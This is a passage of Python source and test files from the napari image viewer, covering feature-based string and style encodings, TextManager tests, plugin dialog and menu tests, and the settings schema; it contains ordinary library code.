class DirectStringEncoding(_DerivedStyleEncoding[StringValue, StringArray]):
"""Encodes strings directly from a feature column.
Attributes
----------
feature : str
The name of the feature that contains the desired strings.
fallback : StringValue
The safe constant fallback string to use if the feature column
does not contain valid string values.
encoding_type : Literal['DirectStringEncoding']
The type of encoding this specifies, which is useful for distinguishing
this from other encodings when passing this as a dictionary.
"""
feature: str
fallback: StringValue = DEFAULT_STRING
encoding_type: Literal['DirectStringEncoding'] = 'DirectStringEncoding'
def __call__(self, features: Any) -> StringArray:
return np.array(features[self.feature], dtype=str)
class FormatStringEncoding(_DerivedStyleEncoding[StringValue, StringArray]):
"""Encodes string values by formatting feature values.
Attributes
----------
format : str
A format string with the syntax supported by :func:`str.format`,
where all format fields should be feature names.
fallback : StringValue
The safe constant fallback string to use if the format string
is not valid or contains fields other than feature names.
encoding_type : Literal['FormatStringEncoding']
The type of encoding this specifies, which is useful for distinguishing
this from other encodings when passing this as a dictionary.
"""
format: str
fallback: StringValue = DEFAULT_STRING
encoding_type: Literal['FormatStringEncoding'] = 'FormatStringEncoding'
def __call__(self, features: Any) -> StringArray:
values = [
self.format.format(**_get_feature_row(features, i))
for i in range(len(features))
]
return np.array(values, dtype=str)
def _get_feature_row(features: Any, index: int) -> Dict[str, Any]:
"""Returns one row of the features table as a dictionary."""
return {name: values.iloc[index] for name, values in features.items()}
def _is_format_string(string: str) -> bool:
"""Returns True if a string is a valid format string with at least one field, False otherwise."""
try:
fields = tuple(
field
for _, field, _, _ in Formatter().parse(string)
if field is not None
)
except ValueError:
return False
return len(fields) > 0
```
#### File: layers/utils/style_encoding.py
```python
import warnings
from abc import ABC, abstractmethod
from typing import Any, Generic, List, TypeVar, Union
import numpy as np
from typing_extensions import Protocol, runtime_checkable
from ...utils.events import EventedModel
from ...utils.translations import trans
IndicesType = Union[range, List[int], np.ndarray]
"""The variable type of a single style value."""
StyleValue = TypeVar('StyleValue', bound=np.ndarray)
"""The variable type of multiple style values in an array."""
StyleArray = TypeVar('StyleArray', bound=np.ndarray)
@runtime_checkable
class StyleEncoding(Protocol[StyleValue, StyleArray]):
"""Encodes generic style values, like colors and strings, from layer features.
The public API of any StyleEncoding is just __call__, such that it can
be called to generate style values from layer features. That call should
be stateless, in that the values returned only depend on the given features.
A StyleEncoding also has a private API that provides access to and mutation
of previously generated and cached style values. This currently needs to be
implemented to maintain some related behaviors in napari, but may be removed
from this protocol in the future.
"""
def __call__(self, features: Any) -> Union[StyleValue, StyleArray]:
"""Apply this encoding with the given features to generate style values.
Parameters
----------
features : Dataframe-like
The layer features table from which to derive the output values.
Returns
-------
Union[StyleValue, StyleArray]
Either a single style value (e.g. from a constant encoding) or an
array of encoded values the same length as the given features.
Raises
------
KeyError, ValueError
If generating values from the given features fails.
"""
@property
def _values(self) -> Union[StyleValue, StyleArray]:
"""The previously generated and cached values."""
def _apply(self, features: Any) -> None:
"""Applies this to the tail of the given features and updates cached values.
If the cached values are longer than the given features, this will remove
the extra cached values. If they are the same length, this may do nothing.
Parameters
----------
features : Dataframe-like
The full layer features table from which to derive the output values.
"""
def _append(self, array: StyleArray) -> None:
"""Appends raw style values to cached values.
This is useful for supporting the paste operation in layers.
Parameters
----------
array : StyleArray
The values to append. The dimensionality of these should match that of the existing style values.
"""
def _delete(self, indices: IndicesType) -> None:
"""Deletes cached style values by index.
Parameters
----------
indices
The indices of the style values to remove.
"""
def _clear(self) -> None:
"""Clears all previously generated and cached values."""
def _json_encode(self) -> dict:
"""Convert this to a dictionary that can be passed to json.dumps.
Returns
-------
dict
The dictionary representation of this with JSON compatible keys and values.
"""
class _StyleEncodingModel(EventedModel):
class Config:
# Forbid extra initialization parameters instead of ignoring
# them by default. This is useful when parsing style encodings
# from dicts, as different types of encodings may have the same
# field names.
# https://pydantic-docs.helpmanual.io/usage/model_config/#options
extra = 'forbid'
# The following classes provide generic implementations of common ways
# to encode style values, like constant, manual, and derived encodings.
# They inherit Python's built-in `Generic` type, so that an encoding with
# a specific output type can inherit the generic type annotations from
# this class along with the functionality it provides. For example,
# `ConstantStringEncoding.__call__` returns an `Array[str, ()]` whereas
# `ConstantColorEncoding.__call__` returns an `Array[float, (4,)]`.
# For more information on `Generic`, see the official docs.
# https://docs.python.org/3/library/typing.html#generics
class _ConstantStyleEncoding(
_StyleEncodingModel, Generic[StyleValue, StyleArray]
):
"""Encodes a constant style value.
This encoding is generic so that it can be used to implement style
encodings with different value types like Array[]
Attributes
----------
constant : StyleValue
The constant style value.
"""
constant: StyleValue
def __call__(self, features: Any) -> Union[StyleValue, StyleArray]:
return self.constant
@property
def _values(self) -> Union[StyleValue, StyleArray]:
return self.constant
def _apply(self, features: Any) -> None:
pass
def _append(self, array: StyleArray) -> None:
pass
def _delete(self, indices: IndicesType) -> None:
pass
def _clear(self) -> None:
pass
def _json_encode(self) -> dict:
return self.dict()
class _ManualStyleEncoding(
_StyleEncodingModel, Generic[StyleValue, StyleArray]
):
"""Encodes style values manually.
The style values are encoded manually in the array attribute, so that
attribute can be written to make persistent updates.
Attributes
----------
array : np.ndarray
The array of values.
default : np.ndarray
The default style value that is used when ``array`` is shorter than
the given features.
"""
array: StyleArray
default: StyleValue
def __call__(self, features: Any) -> Union[StyleArray, StyleValue]:
n_values = self.array.shape[0]
n_rows = features.shape[0]
if n_rows > n_values:
tail_array = np.array([self.default] * (n_rows - n_values))
return np.append(self.array, tail_array, axis=0)
return np.array(self.array[:n_rows])
@property
def _values(self) -> Union[StyleValue, StyleArray]:
return self.array
def _apply(self, features: Any) -> None:
self.array = self(features)
def _append(self, array: StyleArray) -> None:
self.array = np.append(self.array, array, axis=0)
def _delete(self, indices: IndicesType) -> None:
self.array = np.delete(self.array, indices, axis=0)
def _clear(self) -> None:
pass
def _json_encode(self) -> dict:
return self.dict()
class _DerivedStyleEncoding(
_StyleEncodingModel, Generic[StyleValue, StyleArray], ABC
):
"""Encodes style values by deriving them from feature values.
Attributes
----------
fallback : StyleValue
The fallback style value.
"""
fallback: StyleValue
_cached: StyleArray
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._cached = _empty_array_like(self.fallback)
@abstractmethod
def __call__(self, features: Any) -> Union[StyleValue, StyleArray]:
pass
@property
def _values(self) -> Union[StyleValue, StyleArray]:
return self._cached
def _apply(self, features: Any) -> None:
n_cached = self._cached.shape[0]
n_rows = features.shape[0]
if n_cached < n_rows:
tail_array = self._call_safely(features.iloc[n_cached:n_rows])
self._append(tail_array)
elif n_cached > n_rows:
self._cached = self._cached[:n_rows]
def _call_safely(self, features: Any) -> StyleArray:
"""Calls this without raising encoding errors, warning instead."""
try:
array = self(features)
except (KeyError, ValueError):
warnings.warn(
trans._(
'Applying the encoding failed. Using the safe fallback value instead.',
deferred=True,
),
category=RuntimeWarning,
)
shape = (features.shape[0],) + self.fallback.shape
array = np.broadcast_to(self.fallback, shape)
return array
def _append(self, array: StyleArray) -> None:
self._cached = np.append(self._cached, array, axis=0)
def _delete(self, indices: IndicesType) -> None:
self._cached = np.delete(self._cached, indices, axis=0)
def _clear(self) -> None:
self._cached = _empty_array_like(self.fallback)
def _json_encode(self) -> dict:
return self.dict()
def _get_style_values(
encoding: StyleEncoding[StyleValue, StyleArray], indices: IndicesType
):
"""Returns a scalar style value or indexes non-scalar style values."""
values = encoding._values
return values if values.ndim == 0 else values[indices]
def _empty_array_like(value: StyleValue) -> StyleArray:
"""Returns an empty array with the same type and remaining shape of the given value."""
shape = (0,) + value.shape
return np.empty_like(value, shape=shape)
```
#### File: utils/_tests/test_text_manager.py
```python
import numpy as np
import pandas as pd
import pytest
from pydantic import ValidationError
from napari.layers.utils.string_encoding import (
ConstantStringEncoding,
FormatStringEncoding,
ManualStringEncoding,
)
from napari.layers.utils.text_manager import TextManager
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_empty_text_manager_property():
"""Test creating an empty text manager in property mode.
This is for creating an empty layer with text initialized.
"""
properties = {'confidence': np.empty(0, dtype=float)}
text_manager = TextManager(
text='confidence', n_text=0, properties=properties
)
assert text_manager.values.size == 0
# add a text element
new_properties = {'confidence': np.array([0.5])}
text_manager.add(new_properties, 1)
np.testing.assert_equal(text_manager.values, ['0.5'])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_add_many_text_property():
properties = {'confidence': np.empty(0, dtype=float)}
text_manager = TextManager(
text='confidence',
n_text=0,
properties=properties,
)
text_manager.add({'confidence': np.array([0.5])}, 2)
np.testing.assert_equal(text_manager.values, ['0.5'] * 2)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_empty_text_manager_format():
"""Test creating an empty text manager in formatted mode.
This is for creating an empty layer with text initialized.
"""
properties = {'confidence': np.empty(0, dtype=float)}
text = 'confidence: {confidence:.2f}'
text_manager = TextManager(text=text, n_text=0, properties=properties)
assert text_manager.values.size == 0
# add a text element
new_properties = {'confidence': np.array([0.5])}
text_manager.add(new_properties, 1)
np.testing.assert_equal(text_manager.values, ['confidence: 0.50'])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_add_many_text_formatted():
properties = {'confidence': np.empty(0, dtype=float)}
text_manager = TextManager(
text='confidence: {confidence:.2f}',
n_text=0,
properties=properties,
)
text_manager.add({'confidence': np.array([0.5])}, 2)
np.testing.assert_equal(text_manager.values, ['confidence: 0.50'] * 2)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_manager_property():
n_text = 3
text = 'class'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
text_manager = TextManager(text=text, n_text=n_text, properties=properties)
np.testing.assert_equal(text_manager.values, classes)
# add new text with properties
new_properties = {'class': np.array(['A']), 'confidence': np.array([0.5])}
text_manager.add(new_properties, 1)
expected_text_2 = np.concatenate([classes, ['A']])
np.testing.assert_equal(text_manager.values, expected_text_2)
# remove the first text element
text_manager.remove({0})
np.testing.assert_equal(text_manager.values, expected_text_2[1::])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_manager_format():
n_text = 3
text = 'confidence: {confidence:.2f}'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
expected_text = np.array(
['confidence: 0.50', 'confidence: 0.30', 'confidence: 1.00']
)
text_manager = TextManager(text=text, n_text=n_text, properties=properties)
np.testing.assert_equal(text_manager.values, expected_text)
# add new text with properties
new_properties = {'class': np.array(['A']), 'confidence': np.array([0.5])}
text_manager.add(new_properties, 1)
expected_text_2 = np.concatenate([expected_text, ['confidence: 0.50']])
np.testing.assert_equal(text_manager.values, expected_text_2)
# test getting the text elements when there are none in view
text_view = text_manager.view_text([])
np.testing.assert_equal(text_view, np.empty((0,), dtype=str))
# test getting the text elements when the first two elements are in view
text_view = text_manager.view_text([0, 1])
np.testing.assert_equal(text_view, expected_text_2[0:2])
text_manager.anchor = 'center'
coords = np.array([[0, 0], [10, 10], [20, 20]])
text_coords = text_manager.compute_text_coords(coords, ndisplay=3)
np.testing.assert_equal(text_coords, (coords, 'center', 'center'))
# remove the first text element
text_manager.remove({0})
np.testing.assert_equal(text_manager.values, expected_text_2[1::])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_refresh_text():
n_text = 3
text = 'class'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
text_manager = TextManager(text=text, n_text=n_text, properties=properties)
new_classes = np.array(['D', 'E', 'F'])
new_properties = {
'class': new_classes,
'confidence': np.array([0.5, 0.3, 1]),
}
text_manager.refresh_text(new_properties)
np.testing.assert_equal(new_classes, text_manager.values)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_equality():
n_text = 3
text = 'class'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
text_manager_1 = TextManager(
text=text, n_text=n_text, properties=properties, color='red'
)
text_manager_2 = TextManager(
text=text, n_text=n_text, properties=properties, color='red'
)
assert text_manager_1 == text_manager_2
assert not (text_manager_1 != text_manager_2)
text_manager_2.color = 'blue'
assert text_manager_1 != text_manager_2
assert not (text_manager_1 == text_manager_2)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_blending_modes():
n_text = 3
text = 'class'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
text_manager = TextManager(
text=text,
n_text=n_text,
properties=properties,
color='red',
blending='translucent',
)
assert text_manager.blending == 'translucent'
# set to another valid blending mode
text_manager.blending = 'additive'
assert text_manager.blending == 'additive'
# set to opaque, which is not allowed
with pytest.warns(RuntimeWarning):
text_manager.blending = 'opaque'
assert text_manager.blending == 'translucent'
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_with_invalid_format_string_then_fallback_with_warning():
n_text = 3
text = 'confidence: {confidence:.2f'
properties = {'confidence': np.array([0.5, 0.3, 1])}
with pytest.warns(RuntimeWarning):
text_manager = TextManager(
text=text, n_text=n_text, properties=properties
)
np.testing.assert_array_equal(text_manager.values, [''] * n_text)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_with_format_string_missing_property_then_fallback_with_warning():
n_text = 3
text = 'score: {score:.2f}'
properties = {'confidence': np.array([0.5, 0.3, 1])}
with pytest.warns(RuntimeWarning):
text_manager = TextManager(
text=text, n_text=n_text, properties=properties
)
np.testing.assert_array_equal(text_manager.values, [''] * n_text)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_constant_then_repeat_values():
n_text = 3
properties = {'class': np.array(['A', 'B', 'C'])}
text_manager = TextManager(
text={'constant': 'point'}, n_text=n_text, properties=properties
)
np.testing.assert_array_equal(text_manager.values, ['point'] * n_text)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_constant_with_no_properties():
text_manager = TextManager(text={'constant': 'point'}, n_text=3)
np.testing.assert_array_equal(text_manager.values, ['point'] * 3)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_add_with_text_constant():
n_text = 3
properties = {'class': np.array(['A', 'B', 'C'])}
text_manager = TextManager(
text={'constant': 'point'}, n_text=n_text, properties=properties
)
np.testing.assert_array_equal(text_manager.values, ['point'] * 3)
text_manager.add({'class': np.array(['C'])}, 2)
np.testing.assert_array_equal(text_manager.values, ['point'] * 5)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_add_with_text_constant_init_empty():
properties = {}
text_manager = TextManager(
text={'constant': 'point'}, n_text=0, properties=properties
)
text_manager.add({'class': np.array(['C'])}, 2)
np.testing.assert_array_equal(text_manager.values, ['point'] * 2)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_remove_with_text_constant_then_ignored():
n_text = 5
properties = {'class': np.array(['A', 'B', 'C', 'D', 'E'])}
text_manager = TextManager(
text={'constant': 'point'}, n_text=n_text, properties=properties
)
text_manager.remove([1, 3])
np.testing.assert_array_equal(text_manager.values, ['point'] * n_text)
def test_from_layer():
text = {
'string': 'class',
'translation': [-0.5, 1],
'visible': False,
}
features = pd.DataFrame(
{
'class': np.array(['A', 'B', 'C']),
'confidence': np.array([1, 0.5, 0]),
}
)
text_manager = TextManager._from_layer(
text=text,
features=features,
)
np.testing.assert_array_equal(text_manager.values, ['A', 'B', 'C'])
np.testing.assert_array_equal(text_manager.translation, [-0.5, 1])
assert not text_manager.visible
def test_from_layer_with_no_text():
features = pd.DataFrame({})
text_manager = TextManager._from_layer(
text=None,
features=features,
)
assert text_manager.string == ConstantStringEncoding(constant='')
def test_update_from_layer():
text = {
'string': 'class',
'translation': [-0.5, 1],
'visible': False,
}
features = pd.DataFrame(
{
'class': ['A', 'B', 'C'],
'confidence': [1, 0.5, 0],
}
)
text_manager = TextManager._from_layer(
text=text,
features=features,
)
text = {
'string': 'Conf: {confidence:.2f}',
'translation': [1.5, -2],
'size': 9000,
}
text_manager._update_from_layer(text=text, features=features)
np.testing.assert_array_equal(
text_manager.values, ['Conf: 1.00', 'Conf: 0.50', 'Conf: 0.00']
)
np.testing.assert_array_equal(text_manager.translation, [1.5, -2])
assert text_manager.visible
assert text_manager.size == 9000
def test_update_from_layer_with_invalid_value_fails_safely():
features = pd.DataFrame(
{
'class': ['A', 'B', 'C'],
'confidence': [1, 0.5, 0],
}
)
text_manager = TextManager._from_layer(
text='class',
features=features,
)
before = text_manager.copy(deep=True)
text = {
'string': 'confidence',
'size': -3,
}
with pytest.raises(ValidationError):
text_manager._update_from_layer(text=text, features=features)
assert text_manager == before
def test_update_from_layer_with_warning_only_one_emitted():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager._from_layer(
text='class',
features=features,
)
text = {
'string': 'class',
'blending': 'opaque',
}
with pytest.warns(RuntimeWarning) as record:
text_manager._update_from_layer(
text=text,
features=features,
)
assert len(record) == 1
def test_init_with_constant_string():
text_manager = TextManager(string={'constant': 'A'})
assert text_manager.string == ConstantStringEncoding(constant='A')
np.testing.assert_array_equal(text_manager.values, 'A')
def test_init_with_manual_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string=['A', 'B', 'C'], features=features)
assert text_manager.string == ManualStringEncoding(array=['A', 'B', 'C'])
np.testing.assert_array_equal(text_manager.values, ['A', 'B', 'C'])
def test_init_with_format_string():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager(string='class: {class}', features=features)
assert text_manager.string == FormatStringEncoding(format='class: {class}')
np.testing.assert_array_equal(
text_manager.values, ['class: A', 'class: B', 'class: C']
)
def test_apply_with_constant_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string={'constant': 'A'})
features = pd.DataFrame(index=range(5))
text_manager.apply(features)
np.testing.assert_array_equal(text_manager.values, 'A')
def test_apply_with_manual_string():
string = {
'array': ['A', 'B', 'C'],
'default': 'D',
}
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string=string, features=features)
features = pd.DataFrame(index=range(5))
text_manager.apply(features)
np.testing.assert_array_equal(
text_manager.values, ['A', 'B', 'C', 'D', 'D']
)
def test_apply_with_derived_string():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager(string='class: {class}', features=features)
features = pd.DataFrame({'class': ['A', 'B', 'C', 'D', 'E']})
text_manager.apply(features)
np.testing.assert_array_equal(
text_manager.values,
['class: A', 'class: B', 'class: C', 'class: D', 'class: E'],
)
def test_refresh_with_constant_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string={'constant': 'A'})
text_manager.string = {'constant': 'B'}
text_manager.refresh(features)
np.testing.assert_array_equal(text_manager.values, 'B')
def test_refresh_with_manual_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string=['A', 'B', 'C'], features=features)
text_manager.string = ['C', 'B', 'A']
text_manager.refresh(features)
np.testing.assert_array_equal(text_manager.values, ['C', 'B', 'A'])
def test_refresh_with_derived_string():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager(string='class: {class}', features=features)
features = pd.DataFrame({'class': ['E', 'D', 'C', 'B', 'A']})
text_manager.refresh(features)
np.testing.assert_array_equal(
text_manager.values,
['class: E', 'class: D', 'class: C', 'class: B', 'class: A'],
)
def test_copy_paste_with_constant_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string={'constant': 'A'}, features=features)
copied = text_manager._copy([0, 2])
text_manager._paste(**copied)
np.testing.assert_array_equal(text_manager.values, 'A')
def test_copy_paste_with_manual_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string=['A', 'B', 'C'], features=features)
copied = text_manager._copy([0, 2])
text_manager._paste(**copied)
np.testing.assert_array_equal(
text_manager.values, ['A', 'B', 'C', 'A', 'C']
)
def test_copy_paste_with_derived_string():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager(string='class: {class}', features=features)
copied = text_manager._copy([0, 2])
text_manager._paste(**copied)
np.testing.assert_array_equal(
text_manager.values,
['class: A', 'class: B', 'class: C', 'class: A', 'class: C'],
)
def test_serialization():
features = pd.DataFrame(
{'class': ['A', 'B', 'C'], 'confidence': [0.5, 0.3, 1]}
)
original = TextManager(features=features, string='class', color='red')
serialized = original.dict()
deserialized = TextManager(**serialized)
assert original == deserialized
def test_view_text_with_constant_text():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string={'constant': 'A'}, features=features)
copied = text_manager._copy([0, 2])
text_manager._paste(**copied)
actual = text_manager.view_text([0, 1])
# view_text promises to return an Nx1 array, not just something
# broadcastable to an Nx1, so explicitly check the length
# because assert_array_equal broadcasts scalars automatically
assert len(actual) == 2
np.testing.assert_array_equal(actual, ['A', 'A'])
```
#### File: dialogs/_tests/test_qt_plugin_dialog.py
```python
from typing import Generator, Optional, Tuple
import pytest
from npe2 import PackageMetadata
from napari._qt.dialogs import qt_plugin_dialog
def _iter_napari_hub_or_pypi_plugin_info(
conda_forge: bool,
) -> Generator[Tuple[Optional[PackageMetadata], bool], None, None]:
"""Mock the hub and pypi methods to collect available plugins.
This will mock `napari.plugins.hub.iter_hub_plugin_info` for napari-hub,
and `napari.plugins.pypi.iter_napari_plugin_info` for pypi.
It will return two fake plugins that will populate the available plugins
list (the bottom one). The first plugin will not be available on
conda-forge so will be greyed out ("test-name-0"). The second plugin will
be available on conda-forge so will be enabled ("test-name-1").
"""
# This mock `base_data`` will be the same for both fake plugins.
base_data = {
"metadata_version": "1.0",
"version": "0.1.0",
"summary": "some test package",
"home_page": "http://napari.org",
"author": "test author",
"license": "UNKNOWN",
}
for i in range(2):
yield PackageMetadata(name=f"test-name-{i}", **base_data), bool(i)
@pytest.fixture
def plugin_dialog(qtbot, monkeypatch):
"""Fixture that provides a plugin dialog for a normal napari install."""
for method_name in ["iter_hub_plugin_info", "iter_napari_plugin_info"]:
monkeypatch.setattr(
qt_plugin_dialog,
method_name,
_iter_napari_hub_or_pypi_plugin_info,
)
# This is patching `napari.utils.misc.running_as_constructor_app` function
# to mock a normal napari install.
monkeypatch.setattr(
qt_plugin_dialog,
"running_as_constructor_app",
lambda: False,
)
widget = qt_plugin_dialog.QtPluginDialog()
widget.show()
qtbot.wait(300)
qtbot.add_widget(widget)
return widget
@pytest.fixture
def plugin_dialog_constructor(qtbot, monkeypatch):
"""
Fixture that provides a plugin dialog for a constructor based install.
"""
for method_name in ["iter_hub_plugin_info", "iter_napari_plugin_info"]:
monkeypatch.setattr(
qt_plugin_dialog,
method_name,
_iter_napari_hub_or_pypi_plugin_info,
)
# This is patching `napari.utils.misc.running_as_constructor_app` function
# to mock a constructor based install.
monkeypatch.setattr(
qt_plugin_dialog,
"running_as_constructor_app",
lambda: True,
)
widget = qt_plugin_dialog.QtPluginDialog()
widget.show()
qtbot.wait(300)
qtbot.add_widget(widget)
return widget
def test_filter_not_available_plugins(plugin_dialog_constructor):
"""
Check that the plugins listed under available plugins are
enabled and disabled accordingly.
The first plugin ("test-name-0") is not available on conda-forge and
should be disabled, and show a tooltip warning.
The second plugin ("test-name-1") is available on conda-forge and
should be enabled without the tooltip warning.
"""
item = plugin_dialog_constructor.available_list.item(0)
widget = plugin_dialog_constructor.available_list.itemWidget(item)
if widget:
assert not widget.action_button.isEnabled()
assert widget.warning_tooltip.isVisible()
item = plugin_dialog_constructor.available_list.item(1)
widget = plugin_dialog_constructor.available_list.itemWidget(item)
assert widget.action_button.isEnabled()
assert not widget.warning_tooltip.isVisible()
def test_filter_available_plugins(plugin_dialog):
"""
Test the dialog is correctly filtering plugins in the available plugins
list (the bottom one).
"""
plugin_dialog.filter("")
assert plugin_dialog.available_list.count() == 2
assert plugin_dialog.available_list._count_visible() == 2
plugin_dialog.filter("no-match@123")
assert plugin_dialog.available_list._count_visible() == 0
plugin_dialog.filter("")
plugin_dialog.filter("test-name-0")
assert plugin_dialog.available_list._count_visible() == 1
def test_filter_installed_plugins(plugin_dialog):
"""
Test the dialog is correctly filtering plugins in the installed plugins
list (the top one).
"""
plugin_dialog.filter("")
assert plugin_dialog.installed_list._count_visible() >= 0
plugin_dialog.filter("no-match@123")
assert plugin_dialog.installed_list._count_visible() == 0
def test_visible_widgets(plugin_dialog):
"""
Test that the direct entry button and textbox are visible for
normal napari installs.
"""
assert plugin_dialog.direct_entry_edit.isVisible()
assert plugin_dialog.direct_entry_btn.isVisible()
def test_constructor_visible_widgets(plugin_dialog_constructor):
"""
Test that the direct entry button and textbox are hidden for
constructor based napari installs.
"""
assert not plugin_dialog_constructor.direct_entry_edit.isVisible()
assert not plugin_dialog_constructor.direct_entry_btn.isVisible()
```
#### File: menus/_tests/test_file_menu.py
```python
from unittest import mock
from npe2 import DynamicPlugin
from npe2.manifest.contributions import SampleDataURI
def test_sample_data_triggers_reader_dialog(
mock_npe2_pm, tmp_reader, make_napari_viewer
):
"""Sample data pops reader dialog if multiple compatible readers"""
# make two tmp readers that take tif files
tmp_reader(mock_npe2_pm, 'tif-reader', filename_patterns=['*.tif'])
tmp_reader(mock_npe2_pm, 'other-tif-reader', filename_patterns=['*.tif'])
# make a sample data reader for tif file
tmp_sample_plugin = DynamicPlugin('sample-plugin', mock_npe2_pm)
my_sample = SampleDataURI(
key='tmp-sample',
display_name='Temp Sample',
uri='some-path/some-file.tif',
)
tmp_sample_plugin.manifest.contributions.sample_data = [my_sample]
tmp_sample_plugin.register()
viewer = make_napari_viewer()
sample_action = viewer.window.file_menu.open_sample_menu.actions()[0]
with mock.patch(
'napari._qt.menus.file_menu.handle_gui_reading'
) as mock_read:
sample_action.trigger()
# assert that handle gui reading was called
mock_read.assert_called_once()
```
#### File: menus/_tests/test_util.py
```python
from unittest.mock import MagicMock
from qtpy.QtWidgets import QMenu
from napari._qt.menus._util import populate_menu
def test_populate_menu_create(qtbot):
"""Test the populate_menu function."""
mock = MagicMock()
menu = QMenu()
populate_menu(menu, [{"text": "test", "slot": mock}])
assert len(menu.actions()) == 1
assert menu.actions()[0].text() == "test"
assert menu.actions()[0].isCheckable() is False
with qtbot.waitSignal(menu.actions()[0].triggered):
menu.actions()[0].trigger()
mock.assert_called_once()
def test_populate_menu_create_checkable(qtbot):
"""Test the populate_menu function with checkable actions."""
mock = MagicMock()
menu = QMenu()
populate_menu(menu, [{"text": "test", "slot": mock, "checkable": True}])
assert len(menu.actions()) == 1
assert menu.actions()[0].text() == "test"
assert menu.actions()[0].isCheckable() is True
with qtbot.waitSignal(menu.actions()[0].triggered):
menu.actions()[0].trigger()
mock.assert_called_once_with(True)
mock.reset_mock()
with qtbot.waitSignal(menu.actions()[0].triggered):
menu.actions()[0].trigger()
mock.assert_called_once_with(False)
```
#### File: napari/settings/_napari_settings.py
```python
import os
from pathlib import Path
from typing import Any, Optional
from pydantic import Field
from ..utils._base import _DEFAULT_CONFIG_PATH
from ..utils.translations import trans
from ._appearance import AppearanceSettings
from ._application import ApplicationSettings
from ._base import _NOT_SET, EventedConfigFileSettings, _remove_empty_dicts
from ._experimental import ExperimentalSettings
from ._fields import Version
from ._plugins import PluginsSettings
from ._shortcuts import ShortcutsSettings
_CFG_PATH = os.getenv('NAPARI_CONFIG', _DEFAULT_CONFIG_PATH)
CURRENT_SCHEMA_VERSION = Version(0, 5, 0)
class NapariSettings(EventedConfigFileSettings):
"""Schema for napari settings."""
# 1. If you want to *change* the default value of a current option, you need to
# do a MINOR update in config version, e.g. from 3.0.0 to 3.1.0
# 2. If you want to *remove* options that are no longer needed in the codebase,
# or if you want to *rename* options, then you need to do a MAJOR update in
# version, e.g. from 3.0.0 to 4.0.0
# 3. You don't need to touch this value if you're just adding a new option
schema_version: Version = Field(
CURRENT_SCHEMA_VERSION,
description=trans._("Napari settings schema version."),
)
application: ApplicationSettings = Field(
default_factory=ApplicationSettings,
title=trans._("Application"),
description=trans._("Main application settings."),
)
appearance: AppearanceSettings = Field(
default_factory=AppearanceSettings,
title=trans._("Appearance"),
description=trans._("User interface appearance settings."),
)
plugins: PluginsSettings = Field(
default_factory=PluginsSettings,
title=trans._("Plugins"),
description=trans._("Plugins settings."),
)
shortcuts: ShortcutsSettings = Field(
default_factory=ShortcutsSettings,
title=trans._("Shortcuts"),
description=trans._("Shortcut settings."),
)
experimental: ExperimentalSettings = Field(
default_factory=ExperimentalSettings,
title=trans._("Experimental"),
description=trans._("Experimental settings."),
)
# private attributes and ClassVars will not appear in the schema
_config_path: Optional[Path] = Path(_CFG_PATH) if _CFG_PATH else None
class Config(EventedConfigFileSettings.Config):
env_prefix = 'napari_'
use_enum_values = False
# all of these fields are evented models, so we don't want to break
# connections by setting the top-level field itself
# (you can still mutate attributes in the subfields)
allow_mutation = False
@classmethod
def _config_file_settings_source(cls, settings) -> dict:
# before '0.4.0' we didn't write the schema_version in the file
# written to disk. so if it's missing, add schema_version of 0.3.0
d = super()._config_file_settings_source(settings)
d.setdefault('schema_version', '0.3.0')
return d
def __init__(self, config_path=_NOT_SET, **values: Any) -> None:
super().__init__(config_path, **values)
self._maybe_migrate()
def _save_dict(self, **kwargs):
# we always want schema_version written to the settings.yaml
# TODO: is there a better way to always include schema version?
return {
'schema_version': self.schema_version,
**super()._save_dict(**kwargs),
}
def __str__(self):
out = 'NapariSettings (defaults excluded)\n' + 34 * '-' + '\n'
data = self.dict(exclude_defaults=True)
out += self._yaml_dump(_remove_empty_dicts(data))
return out
def __repr__(self):
return str(self)
def _maybe_migrate(self):
if self.schema_version < CURRENT_SCHEMA_VERSION:
from ._migrations import do_migrations
do_migrations(self)
if __name__ == '__main__':
import sys
if len(sys.argv) > 2:
dest = Path(sys.argv[2]).expanduser().absolute()
else:
dest = Path(__file__).parent / 'napari.schema.json'
dest.write_text(NapariSettings.schema_json())
```
#### File: settings/_tests/test_migrations.py
```python
import os
from importlib.metadata import distribution
from unittest.mock import patch
import pytest
from napari.settings import NapariSettings, _migrations
